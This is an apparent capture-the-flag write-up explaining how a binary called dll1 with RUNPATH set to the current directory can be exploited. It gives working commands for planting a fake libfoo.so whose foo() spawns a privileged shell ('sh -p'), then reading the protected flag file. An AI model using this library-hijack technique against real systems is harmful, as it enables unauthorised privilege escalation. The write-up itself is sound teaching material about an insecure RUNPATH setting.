Either with `checksec` or with `readelf -d` we can see that `dll1`
contains a `RUNPATH` set to dot, i.e., the current directory.  The problem
is that this refers to the current directory of the user that is running
the program, not the directory where the program is installed. This
means that we can move to a directory where we can write and create a
new `libfoo.so` shared library there; then we run `dll1` without moving
out of the directory and the dynamic loader will load our `libfoo.so`
library instead of the original one.

Create a temporary directory and move there:
```sh
    tmp=$(mktemp -d)
    cd $tmp
```
Create a fake `libfoo.so`:
```sh
cat > foo.c
#include <unistd.h>

int foo()
{
    execlp("/bin/sh", "sh", "-p", NULL);
}
^D
gcc -o libfoo.so -shared foo.c
```
Note that we override the `foo()` function called by `dll1` in order
to spawn a shell. We pass the `-p` option to the shell in order to
keep the privileged group id of the process.

Now we can run `dll1` an obtain a shell with the rights to read the flag:
```sh
/home/dll1/dll1
$ cat /home/dll1/flag.txt
```
